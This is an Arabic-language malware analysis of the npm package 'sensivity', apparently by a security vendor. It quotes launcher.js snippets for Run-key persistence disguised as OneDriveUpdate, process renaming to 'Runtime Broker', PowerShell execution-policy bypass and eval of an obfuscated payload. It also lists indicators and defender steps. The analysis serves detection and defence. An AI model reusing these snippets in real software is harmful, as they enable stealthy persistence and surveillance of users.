PairLoop: لوحة تحكم عن بعد مخفية في حزمة npm

PairLoop: حزمة npm واحدة، سبعون إصدارًا، ولوحة تحكم عن بُعد مخفية لنظام ويندوز

TL؛ DR

حزمة npm الحساسية يصف نفسه بأنه "لوحة تحكم في الحساسية". على نظام ويندوز، يعمل كأداة للتحكم عن بعد والمراقبة.

نقطة دخولها، launcher.js، ويعيد تسمية عمليته الخاصة إلى وسيط وقت التشغيل، ويكتب قيمة مفتاح التشغيل التلقائي المسماة OneDriveUpdate يقوم هذا بإعادة تشغيل الحزمة من خلال برنامج VBScript مخفي، ويقوم بتشغيل PowerShell مع -ExecutionPolicy Bypassثم يقوم بتقييم حمولة خادم مشفرة بحجم 171 كيلوبايت إلى جانب وحدة أصلية بحجم 6.87 ميجابايت، sens.node.

يقوم هذا البرنامج بتشغيل لوحة تحكم لإقران الهاتف على منفذ TCP 3000 ويقرأ عنوان URL الموجود في شريط عناوين المتصفح النشط من خلال Windows UIAutomation، ويبحث عن فيديو YouTube واحد مبرمج مسبقًا.

تم الآن حلّ الجزأين اللذين كانا يُنظر إليهما سابقًا على أنهما صندوقان أسودان. الخادم المُبهم، server.obf.jsيستخدم مخطط مصفوفة السلاسل RC4 الخاص بـ obfuscator.io؛ إعادة تنفيذ وحدة فك التشفير الخاصة به دون اتصال بالإنترنت (بدون تنفيذ جافا سكريبت) تستعيد نقطة نهاية خارجية واحدة — https://izopi.com/check.php — بالإضافة إلى مفتاح RSA عام مضمن يستخدم للتحقق من ردود الترخيص الموقعة.

الوحدة الأصلية، sens.node، غير مضغوط: جدول الاستيراد الخاص به والسلاسل المضمنة تحدده على أنه طبقة تراكب داخل اللعبة DirectX 11 / Dear ImGui توفر ميزات التصويب التلقائي، وESP (اختراق الجدران)، وميزة إطلاق النار التلقائي، مدفوعة بحقن العمليات عن بعد وقراءة/كتابة الذاكرة.

تشير السلاسل النصية الموجودة بداخله إلى كيانات المركبات ومواقع الخرائط بما يتوافق مع GTA V / FiveM. حزمة npm هي غلاف التوزيع والاستمرارية حول تلك الوحدة الأصلية.

الإشارة الحاسمة هي إشارة تشغيلية وليست تقنية: فقد قام ناشر مجهول واحد بنشر ما يقرب من سبعين نسخة من حزمة واحدة — 2.5.0 خلال 2.5.69 — على مدار بضعة أيام، يحمل كل منهم نفس جهاز الإطلاق.

لا توجد عمليات تثبيت hooksيتم تشغيل الحمولة فقط عند بدء تشغيل الحزمة.

الهجوم: كيف يعمل

تحتوي حزمة sensivity على عشرة ملفات. ملف package.json بسيط للغاية: لا يحتوي على حقل للمستودع، ولا على ترخيص، ويحتوي على اسم رئيسي واسمين بديلين لـ bin (sensivity، sens) تشير جميعها إلى launcher.js، بالإضافة إلى سكربت بدء تشغيل node launcher.js. لا توجد عمليات تثبيت مسبقة أو لاحقة. لا يتم تنفيذ أي شيء عند تثبيت npm. يتم تنفيذ السلوك الموضح أدناه عند بدء تشغيل المستخدم للحزمة - عبر bin shim، أو سكربت بدء التشغيل، أو require.

يحتوي الملف المضغوط على برنامج التشغيل، وخادم مُشفر، ووحدة أصلية، ونص برمجي بلغة فيجوال بيسك، ودليل عام/ويب للوحة التحكم. يُعد ملف launcher.js هو برنامج التنسيق القابل للقراءة؛ أما المنطق المهم أثناء التشغيل فيوجد في الملفين اللذين يقوم بتحميلهما - خادم مُشفر ووحدة أصلية مُجمّعة، وكلاهما مُفصّل أدناه.

 عملية تنكرية وبرنامج تحديث مزيف لـ OneDrive

في بداية عملية التنفيذ، يقوم ملف launcher.js بتعيين اسم العملية الخاص به مرتين:

   javascript process.title = 'Runtime Broker'; 

يُعدّ Runtime Broker عمليةً شرعيةً في نظام ويندوز (RuntimeBroker.exe) تتولى إدارة أذونات التطبيقات. إعادة تسمية عملية Node لتتوافق معه تعني أن نظرةً سريعةً على مدير المهام لن تُظهر أي شيء غير عادي.

تتم كتابة خاصية الثبات من خلال PowerShell بدلاً من واجهة برمجة تطبيقات التسجيل المباشرة:

javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); 

يُسمى خيار التشغيل التلقائي OneDriveUpdate، وهو لا يشير إلى الحزمة مباشرةً، بل إلى wscript.exe الذي يُشغّل OneDrive.Standalone.Updater.vbs المُضمّن. يُعيد هذا البرنامج النصي تشغيل node launcher.js في نافذة مخفية. يستخدم كلٌّ من اسم مفتاح التشغيل واسم ملف VBScript علامة مايكروسوفت التجارية، لذا يُقرأ خيار التشغيل التلقائي كمهمة روتينية في OneDrive.

باور شيل مع تجاوز سياسة التنفيذ

يقوم المشغل باستدعاء PowerShell بشكل متكرر. الهدف الذي تُشير إليه الماسحات الضوئية على أنه حرج هو تشغيل ملف .ps1 مُنشأ مع تعطيل سياسة التنفيذ.

javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); 

يؤدي تجاوز سياسة التنفيذ إلى إزالة فحص توقيع البرنامج النصي المحلي لهذا الاستدعاء. وتتولى البرامج النصية المُنشأة مهام مراقبة المتصفح واكتشاف النوافذ الموضحة في القسم التالي.

الخادم المُشفر والوحدة الأصلية

بعد الإعداد، يقوم ملف launcher.js بتحميل وتنفيذ حمولته الحقيقية:

const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8'));

ملف server.obf.js بحجم 171 كيلوبايت، وهو عبارة عن تشفير مصفوفة _0x - وهو نمط جافا سكريبت يتم فيه استبدال كل سلسلة نصية ومعرّف بفهرس في مصفوفة مُرتبة عشوائيًا، ثم يتم فك تشفيرها أثناء التشغيل. يعتمد هذا النمط على صيغة RC4 المُنتجة بواسطة obfuscator.io: حيث تقوم دالة فك تشفير واحدة بفك تشفير عنصر من المصفوفة باستخدام base64، ثم تقوم بفك تشفيره باستخدام RC4 ومفتاح خاص بكل استدعاء. إعادة تنفيذ دالة فك التشفير هذه في نص برمجي منفصل - بتشغيل إعادة التنفيذ فقط على مصفوفة السلاسل النصية المُستخرجة المكونة من 821 عنصرًا، وليس على جافا سكريبت الخاص بالحزمة - يؤدي إلى فك التشفير بسلاسة. ما يظهر بسيط ولكنه...cisتتضمن هذه العملية: عنوان URL خارجي واحد، https://izopi.com/check.php، مُخصص لثابت LICENSE_URL؛ ومفتاح RSA PUBLIC_KEY_PEM مُضمّن؛ ومسارات لوحة التحكم المحلية /api/kill، و/api/qr.png، و/api/trigger، و/api/url، و/trigger/off، و/trigger/status؛ والسلاسل النصية child_process، وcrypto، و[Sensivity] sens.node loaded — وهي سطر السجل الذي يُعيد المُشغّل كتابته إلى program module loaded. نقطة النهاية هي فحص الترخيص: يُرسل العميل مُعرّفًا (يُنسّق الخادم المُشفر سلسلة Discord ID: %s) ويتحقق مفتاح RSA من استجابة الخادم المُوقّعة.

sens.node عبارة عن إضافة أصلية مُجمّعة بحجم 6.87 ميجابايت، وهي غير مضغوطة - يبلغ مستوى إنتروبيا القسم 5.6-6.6، وجداول استيراد وتصدير PE سليمة، لذا يمكن قراءة إمكانياتها مباشرةً. وهي تُصدّر napi_register_module_v1، و standard نقطة دخول Node N-API، لذا يقوم الخادم المُقيّم بتحميلها باستخدام دالة require بسيطة. جدول الاستيراد الخاص بها هو الدليل. من KERNEL32، تسحب OpenProcess وVirtualAllocEx وWriteProcessMemory وReadProcessMemory وCreateRemoteThread وK32EnumProcessModules وProcess32First/NextW - وهي المجموعة الأساسية لتحديد موقع عملية أخرى، وتخصيص الذاكرة داخلها، وقراءة تلك الذاكرة أو الكتابة إليها. من USER32، تسحب GetAsyncKeyState وGetKeyState وmouse_event وSetCursorPos؛ وتربط d3d11.dll وD3DCOMPILER_43 وdwmapi لتراكب على الشاشة، ومجموعة WINHTTP الكاملة لاستدعاءات الشبكة. تُحدد النصوص المُضمنة مجموعة الميزات بوضوح تام: تفعيل التصويب التلقائي، مجال رؤية التصويب التلقائي، رؤية الصندوق الإلكتروني، رؤية الهيكل العظمي الإلكتروني، إطلاق النار التلقائي، أداة إنشاء الرؤية الإلكترونية، رؤية المركبة الإلكترونية، تم الكشف عن نظام مكافحة الغش Electron، وشعار Dear ImGui Dear ImGui 1.91.3 قيد التطوير. تتوافق نصوص الموقع والكيانات، مثل عيادة Grapeseed الطبية ومفردات رؤية المركبة الإلكترونية، مع GTA V / FiveM.

هذا الفصل مقصودٌ في جوهره: فملف launcher.js القابل للقراءة لا يحمل إلا الأجزاء التي يسهل على الماسح الضوئي قراءتها - كالثبات، والتمويه، واستدعاء eval نفسه - بينما يخفي التشفير المضيف الخارجي الوحيد الذي يتصل به وقت التشغيل، ويحتوي الملف التنفيذي على منطق تراكب اللعبة وحقن العمليات. يُعدّ المشغل بمثابة الغلاف الرقيق القابل للتدقيق؛ ويخفي الخادم المُشفر هوية الشبكة؛ والوحدة الأصلية هي الحمولة. نصف عمليات الاستيراد والسلاسل النصية في الملف التنفيذي بأنها للقراءة؛ ولا نستنتج غرض المُشغّل منها.

 لوحة تحكم إقران الهاتف على المنفذ 3000

يدير المشغل خادم ويب محليًا على منفذ TCP رقم 3000 ويتعامل معه ككائن وحيد. يستعلم عن مستمع موجود ويمسحه قبل الربط.

 javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); 

يمكن الوصول إلى لوحة التحكم عبر الرابط http://localhost:3000، مع عنوان URL احتياطي ثابت للشبكة المحلية وهو http://192.168.1.16:3000. يتوافق دليل public/ وسلوك لوحة التحكم مع آلية اقتران رمز الاستجابة السريعة (QR): حيث يقوم الهاتف بمسح الرمز والربط بالمضيف كجهاز تحكم عن بُعد. لا يظهر أي نطاق تحكم خارجي كنص واضح في المشغل، ولكن كما يوضح فك التشفير أعلاه، يوجد نطاق تحكم في الخادم المُشفر: نقطة نهاية ترخيص izopi.com. لوحة التحكم نفسها محلية ومُقيدة بنطاق الشبكة المحلية؛ والمضيف الصادر الوحيد هو نقطة التحقق من الترخيص.

يُبقي نموذج المشرف/العامل المنفصل العملية قيد التشغيل. يُعيد المُشغّل تشغيل نفسه باستخدام علامات البيئة SENSIVITY_SUPERVISOR وSENSIVITY_WORKER، حيث تعمل كل عملية فرعية بشكل مخفي، لذا فإن إنهاء عملية واحدة يترك مُراقبًا لإعادة تشغيلها.

مراقبة المتصفح وإشارة يوتيوب

أكثر السلوكيات تحديدًا هي مراقبة المتصفح. يقوم ملف launcher.js بإنشاء PowerShell الذي يُشغّل Windows UIAutomation لقراءة شريط عنوان المتصفح قيد التشغيل:

 javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', 

تُعيد دالة ValuePattern محتوى النص لعنصر واجهة المستخدم. عند تطبيقها على عنصر تحكم تحرير شريط العناوين في المتصفح، تُعيد عنوان URL الذي يشاهده المستخدم حاليًا - دون الحاجة إلى إضافة أي ملحق للمتصفح، أو تعديل ملف تعريف المستخدم على القرص، أو استخدام أي واجهة برمجة تطبيقات. يقوم البرنامج النصي المُنشأ بتكرار قائمة $browserNames واستخراج عنوان URL أو عنوان نافذة المتصفح المُستخدم حاليًا.

يتم اختبار عنوان URL هذا مقابل هدف واحد مُبرمج مسبقًا:

 javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; 

يقوم برنامج التشغيل بالتحقق بشكل دوري كل ثلاث ثوانٍ من وجود نافذة متصفح تعرض موقع يوتيوب، ويحمل برنامج PowerShell المُنشأ زوجًا من أوامر Get-YouTubeBrowser وTest-TargetYouTubeUrl التي تتطابق مع مُعرّف الفيديو. التأثير الملحوظ مزدوج: قراءة عنوان URL النشط للتصفح من شاشة الضحية، واكتشاف تفاعل الجهاز مع فيديو محدد على يوتيوب. نشرح آلية عمل البرنامج والهدف، دون استنتاج أي دافع.

يُطلق الماسح الضوئي على قراءة شريط العنوان اسم "sensitive_data_enumeration"، وهي عبارة عن مصدر Process::env وUIAutomation يُغذي بيئة تشغيل قادرة على الاتصال بالشبكة. تبدو هذه القراءة غير ضارة عند عزلها، ولا تُشير إلى المراقبة إلا بعد تتبع دورة حياة البيانات من مصدر UIAutomation إلى الخادم المُخفي.

الجدول الزمني وتطور الإصدارات

لا يُعدّ رفع برنامج Sensivity لمرة واحدة عمليةً واحدة. إذ يحتوي حساب الناشر على ما يقارب سبعين نسخة منشورة من هذه الحزمة، وتستمر النسخ الجديدة بالوصول خلال فترة المراجعة. ويتطور برنامج التشغيل تدريجيًا عبر سلسلة الإصدارات 2.5.x، بينما تبقى آليات حفظ البيانات وتحميل الحمولة ثابتة.

التاريخ (UTC) النسخ التي تمت ملاحظتها حالة المُشغِّل
2026-06-02 2.5.8 - 2.5.46 (25) مشغل لوحة رمز الاستجابة السريعة الأساسي؛ استمرارية مفتاح التشغيل؛ تقييم الخادم المشفر.
2026-06-03 2.5.53 - 2.5.61 (6) نفس البصمة؛ كبت آثار وحدة التحكم.
2026-06-04 2.5.67, 2.5.68 (2) إضافة هدف تفاعل مثبت على يوتيوب wJWta2lO0Lw.
2026-06-05 2.5.0 - 2.5.69 (24) إعادة نشر شاملة لسد الثغرات؛ مراقب المشرفين/العمال.

يُظهر تحليل مُشغّل التطبيقات عبر الإصدارات المُنزّلة - 2.5.0 و2.5.36 و2.5.69 - أربعة مستويات. تحمل الإصدارات الأولى مُشغّل ربط رمز الاستجابة السريعة الأساسي. بدءًا من الإصدار 2.5.33، يظهر مُجمّع عناوين UIAutomation. بدءًا من الإصدار 2.5.58، تُضاف طبقة إدارة المشرف. بدءًا من الإصدار 2.5.64، يُكمّل مُراقب المشرف/العامل المنفصل المجموعة. وعلى مدار هذه الإصدارات، تبقى أربعة عناصر ثابتة: مفتاح تشغيل OneDriveUpdate، وبرنامج OneDrive.Standalone.Updater.vbs، وملف server.obf.js المُقيّم، ووحدة sens.node الأصلية.

تُعدّ موجة التحديث بتاريخ 5 يونيو 2026 جديرة بالذكر لأنها أعادت نشر أرقام الإصدارات المنخفضة - من 2.5.0 إلى 2.5.15 - التي تقع أسفل الإصدارات التي تم تأكيدها قبل أيام. والنتيجة هي وجود سلسلة متصلة من الإصدارات 2.5.x في سجل النظام، حيث يحمل كل إصدار نفس المشغل.

مؤشرات الحل الوسط

تمت قراءة جميع المؤشرات أدناه مباشرةً من ملف الحزمة المضغوط. يحتوي المشغل القابل للقراءة على عنوان اتصال محلي فقط وعنوان شبكة محلية خاصة واحد؛ أما اسم المضيف الخارجي الوحيد، izopi.com، فقد تم استعادته عن طريق فك تشفير ملف server.obf.js دون اتصال بالإنترنت.

النوع مؤشر ملاحظة
فئة الإشتراك npm:sensivity (حوالي 70 إصدارًا، 2.5.0-2.5.69) ناشر حزمة واحدة؛ بدون مستودع؛ غير مرخص.
قم بتقديم launcher.js مُنسق قابل للقراءة؛ هدف رئيسي وهدف ثنائي.
قم بتقديم server.obf.js (≈171 كيلوبايت) حمولة مصفوفة السلاسل النصية RC4 من obfuscator.io، تم تحميلها عبر eval(fs.readFileSync(...)).
قم بتقديم sens.node (≈6.87 ميجابايت) إضافة PE32+ x86-64 Node N-API؛ SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40.
قم بتقديم OneDrive.Standalone.Updater.vbs إعادة تشغيل مخفية (node launcher.js).
الانرنيت https://izopi.com/check.php تم استعادة نقطة نهاية الترخيص/المصادقة من الخادم المشفر؛ ويقوم المفتاح العام RSA المضمن بالتحقق من الاستجابات.
القدرات OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread إمكانية حقن العمليات عن بعد وقراءة/كتابة الذاكرة.
القدرات Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP DirectX 11 / ImGui واجهة عرض الألعاب التي تنفذ ميزات التصويب التلقائي، وESP، والزناد التلقائي.
سجل HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate قيمة التشغيل التلقائي تشير إلى wscript.exe ومشغل VBScript.
طريقة عملنا process.title = 'Runtime Broker' يتنكر في هيئة عملية وسيط وقت التشغيل لنظام التشغيل ويندوز الشرعية.
السلوكية powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 تجاوز سياسة التنفيذ المستخدمة في البرامج النصية PowerShell التي تم إنشاؤها.
السلوكية UIAutomation ValuePattern قراءة شريط عنوان المتصفح يقرأ عنوان URL لنافذة المتصفح الأمامية.
السلوكية معرف الفيديو المستهدف wJWta2lO0Lwاستطلاع رأي على يوتيوب لمدة 3 ثوانٍ تم تثبيت إشارة مراقبة الاشتباك.
الانرنيت http://localhost:3000، خيار احتياطي http://192.168.1.16:3000 لوحة تحكم الاقتران عبر رمز الاستجابة السريعة متاحة محليًا وعلى الشبكة المحلية.
البيئة SENSIVITY_SUPERVISOR, SENSIVITY_WORKER علامات تنسيق عملية مراقبة النظام المنفصلة.

الإسناد والتأثير والمدافعون

تم نشر الحزمة بواسطة حساب npm واحد، وبريده الإلكتروني المُعلن هو عنوان Gmail غير مُوثق. يحمل هذا الحساب تقييمًا سلبيًا للغاية في سجل npm، ولا يقوم إلا بصيانة ونشر هذه الحزمة فقط، وليس له أي مستودع مصدر مرتبط. لم نتحقق من ملكية البريد الإلكتروني، وننسب الحملة إلى حساب الناشر، وليس إلى أي فرد مُحدد. لا يحتوي المُشغل على بنية تحتية واضحة، ولكن المضيف الخارجي الوحيد معروف الآن: يتصل الخادم المُشفر بـ izopi.com للتحقق من الترخيص، والوحدة الأصلية - التي تُقرأ من جدول الاستيراد والسلاسل النصية بدلاً من التعليمات المعكوسة - هي طبقة تراكب للعبة تقوم بحقن وقراءة ذاكرة عملية أخرى.

يقع التأثير الملحوظ على مستخدمي ويندوز الذين يقومون بتثبيت وتشغيل برنامج Sensivity متوقعين وجود أداة لوحة تحكم. على هذه الأجهزة، يقوم البرنامج بإنشاء خاصية التشغيل التلقائي الدائم متخفيًا في صورة مهمة OneDrive، ويعيد تسمية نفسه ليحاكي عملية نظام، ويقرأ عنوان URL لأي شيء يتصفحه المستخدم، ويُنشئ لوحة ربط تربط الجهاز بجهاز بعيد عبر الشبكة المحلية. ونظرًا لوجود خاصية مراقبة المشرف/العامل، فإن إيقاف عملية واحدة لا يزيل البرنامج؛ إذ يبقى إدخال مفتاح التشغيل حتى بعد إعادة التشغيل. لا يستهدف البرنامج نظامي macOS وLinux، فمسارات التشغيل الدائم وPowerShell وUIAutomation خاصة بنظام ويندوز فقط.

يُعدّ التغيير المستمر في الإصدارات، والذي يصل إلى سبعين إصدارًا، اتجاهًا جديرًا بالملاحظة. فإعادة نشر حزمة واحدة عشرات المرات في غضون أيام قليلة، بما في ذلك إضافة أرقام إصدارات أقل من تلك التي أُزيلت بالفعل، يُبقي نسخةً نشطةً في سجل البرامج بين عمليات الإزالة، ويُعيق عمل قوائم الحظر التي تعتمد على تثبيت الإصدارات. فعلى سبيل المثال، لا يُجدي إدخال حزمة sensivity@2.5.61 في قائمة الحظر نفعًا ضد حزمة sensivity@2.5.3 التي أُعيد نشرها في اليوم التالي.

يمكن للمدافعين اتخاذ الإجراءات التالية:

  • قم بحظر حساسية اسم الحزمة تمامًا في قوائم السماح الخاصة بـ registry-proxy و CI. تثبيت إصدارات فردية يُفقدها ميزة إعادة النشر؛ فالاسم هو المؤشر الدائم.
  • ابحث عن قيمة تشغيل باسم OneDriveUpdate، والتي تستدعي بياناتها wscript.exe على ملف .vbs موجود في مسار خاص بكل مستخدم. لا يتم تسجيل مُحدِّث OneDrive الأصلي بهذه الطريقة.
  • تنبيه بشأن عملية Node.js التي تحمل اسم Runtime Broker. الوسيط الحقيقي هو RuntimeBroker.exe، وليس بيئة تشغيل Node.
  • يُشير هذا إلى عمليات جلب الحزم أثناء تثبيت npm التي تتضمن إضافة .node مُجمّعة بالإضافة إلى دالة eval(fs.readFileSync(…)) لملف .obf.js مُشابه. هذا الاقتران - ملف ثنائي أصلي مُبهم مُحمّل بجانب حمولة نصية مُشفرة - هو الدليل الهيكلي هنا، بغض النظر عن أي مؤشر تحكم نصي.
  • تعامل مع أي مستمع مرتبط محليًا على المنفذ 3000 تم إنشاؤه بواسطة عملية Node غير متوقعة على أنه مشبوه على نقاط نهاية Windows المُدارة.
  • قم بحظر أو تنبيه الطلبات الصادرة إلى izopi.com من مضيفات المطورين أو المستخدمين النهائيين؛ إنها نقطة النهاية الخارجية الوحيدة للحزمة، والتي يتم الوصول إليها في /check.php من الخادم المشفر.
  • بالنسبة لأي إضافة .node مدمجة، افحص جدول الاستيراد الخاص بها قبل الوثوق بها. إن الجمع بين OpenProcess وVirtualAllocEx وWriteProcessMemory وCreateRemoteThread يُعد حقنًا للعمليات عن بُعد بغض النظر عما تدعيه الحزمة؛ فهي هنا موجودة بجوار طبقة Direct3D وسلاسل aimbot/ESP/triggerbot.

للتحليل الثابت pipelines، يتميز شكل الإقناع بالثبات عبر تغييرات الإصدارات: ملف تعريف تثبيت غير شبكي، وتعيين عنوان العملية لاسم عملية نظام معروف، وكتابة مفتاح التشغيل عبر PowerShell، وتقييم ملف مقروء من القرص. لا يعتمد أي من هذه العناصر على نطاق أو عنوان IP أو رقم إصدار يمكن أن يتغير مع إعادة النشر التالية.

 مراجع حسابات

[npm: الحساسية] – صفحة التسجيل الخاصة بسطر إصدار الحزمة الذي تمت مناقشته هنا؛ عرضة للإزالة.

أدوات تحليل التركيبات البرمجية sca
إعطاء الأولوية للمخاطر التي تتعرض لها برامجك، ومعالجتها، وتأمينها
احصل على حسابك المجاني.
أي بطاقة ائتمان.

قم بتأمين تطوير البرامج الخاصة بك وتسليمها

مع مجموعة منتجات Xygeni